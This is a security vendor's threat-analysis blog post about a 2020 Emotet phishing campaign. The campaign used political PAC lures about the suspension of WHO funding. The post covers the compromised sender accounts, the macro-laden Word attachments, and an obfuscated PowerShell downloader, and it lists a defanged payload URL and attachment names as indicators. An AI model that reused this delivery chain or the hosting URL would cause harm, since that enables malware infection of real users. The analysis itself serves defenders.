This blog originally appeared in October 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. Learn more.
Following the recent return of Emotet after a five-month hiatus, a newly-discovered phishing campaign is using updated tactics by leveraging the hype surrounding President Trump’s decision to halt U.S. funding for the World Health Organization (WHO). In a ruse to drop this dangerous banking trojan, the malicious messages take the form of a typical Political Action Committee (PAC) email, eliciting support for presidential incumbent Donald Trump in the upcoming 2020 election.
First caught by Area 1 Security on August 21st, this ongoing campaign contains all the hallmarks of the resurgence of Emotet:
- Leveraging stolen email content
- Subject lines prefaced with “Fwd:” and ”RE:”
- And PowerShell commands to download and execute the malware
This campaign, however, aims to compromise politically-related entities rather than just the typical targets of opportunity that are commonly associated with this banking trojan. In Figure 1, you can see how the attacker forwards a legitimate PAC mailer to develop a false sense of legitimacy, with entirely authentic content throughout the body of the message. Every link works and leads to benign web pages of the impersonated PAC.
Like a Wolf in sheep’s clothing, the attacker cleverly disguises their Emotet delivery mechanism as messaging about timely and highly publicized, hot-button issues in politics.
The subject of the email reads “Fwd:Breaking: President. Trump suspends funding to WHO,” and the attacker employs Display Name Spoofing in an attempt to mask the true sender address. The actual sender addresses used to spread the phishing messages vary, but all have one thing in common: each is a legitimate account compromised by the attacker to launch this fraudulent WHO-themed campaign.
A closer look at the attacker’s infrastructure reveals compromised hosts used in the transfer of the phishing messages, such as the sending Mail Transfer Agent (MTA) server[.]websoftperu[.]com. Area 1 Security suspects that this MTA may have been compromised due to an open port running a very outdated version of OpenSSH (7.4), which has numerous vulnerabilities.
- Compromised email accounts of several small businesses around the world were used in each wave of this campaign, again luring victims with the same stolen PAC email content.
- One of these accounts is also connected to similar phishing messages with slightly different lures, all with the intent to infect targets with Emotet.
- The example account above is, in particular, the source of various politically-themed phishing messages that contain stolen content from a number of different PAC mailers and was observed in the targeting of politically-affiliated email accounts.
The attacker primarily uses compromised accounts to successfully pass email authentication protocols, such as DMARC, DKIM, and SPF.
Whereas other malicious actors may look for sender domains that do not have these protocols configured or configured correctly, this attacker boldly leverages correctly-configured authentication protocols to their advantage. This tactic allows the attacker to bypass legacy vendors that solely rely on these authentication methods to provide indicators of maliciousness.
There is approximately one week of turnover time between each wave of the campaign as the attacker retools to get ahead of defenses. This includes various changes, such as modifying the weaponized attachment and using new compromised sender infrastructure and accounts.
Efforts like this can easily equip the attacker with the ability to circumvent typical signature-based detections that depend on IP addresses and payload hashes of known threats, leading defenders through a never-ending game of “cat and mouse”.
Analysis of Malware
At the bottom of the phishing message, there is a Microsoft Word Document that uses VBA Macros to drop the first-stage payload, the Emotet downloader. After clicking on the document, the user is prompted by a dialog box to enable editing and content, as depicted below.
Merely clicking this box will enable a highly obfuscated VBA Macro (as shown in Figure 3) that runs an equally obfuscated PowerShell command using Windows Management Instrumentation (WMI).
The content in Figure 4 shows a sampling of the PowerShell script after Area 1 Security researchers deobfuscated a majority of the code. This script attempts to download Emotet from a list of hardcoded compromised WordPress sites. It first runs through this list of sites (as highlighted below) to determine which are still actively hosting the Emotet trojan.
Area 1 Security found that, among the compromised sites hardcoded in the malware, only the link hxxp://cammis[.]com[.]br/wp-admin/8IArx/ was still active at the time of analysis. Once the final payload is found on a functioning site, it is downloaded to a temporary folder on the victim’s device, located at %userprofiles%\AppData\Local\. From here, a message is sent back to the Emotet command and control (C2) server, confirming that it was successfully downloaded.
What Makes Emotet Difficult to Detect?
Emotet is among some of the most destructive and costly malware, affecting both the public and private sectors. Once this advanced, modular banking trojan compromises a target device, other hosts on the network are at risk of infection, as the malware’s worm-like capabilities allow it to easily self-replicate to other connected devices. Sensitive information on the compromised hosts can be considered free rein, where essentially no data is safe from the attacker.
Since Emotet is primarily delivered via attachments or links in phishing emails, the attacker takes extra measures to ensure their messages will not trigger legacy email security solutions. These tactics range from simply changing the name and hash of the malicious file, to more advanced anti-debugging and host-environment analysis capabilities.
Emotet’s modular Dynamic Link Libraries (DLLs) and polymorphic nature offer the attacker not only continuously evolving capabilities but also effortless evasion of signature-based detection systems. Analysis of this evasive trojan can present challenges for those attempting to reverse the malware, as it is virtual-environment aware and will infinitely sleep in an attempt to render debugging analysis techniques ineffective. With malicious actors using constantly evolving malware, new and advanced techniques are needed to detect and catch these phishing messages before they reach users’ inboxes.
Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology leverage algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real-time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.
Indicators of Compromise
Compromised Sender Email Addresses:
Sender IP Addresses:
Compromised Emotet Websites:
Attachment File Names:
LG-7231 Medical report Covid-19.doc
IQ-5125 Medical report Covid-19.doc
PowerShell Executables (file names are a fixed-length, consisting of seven alphanumeric characters):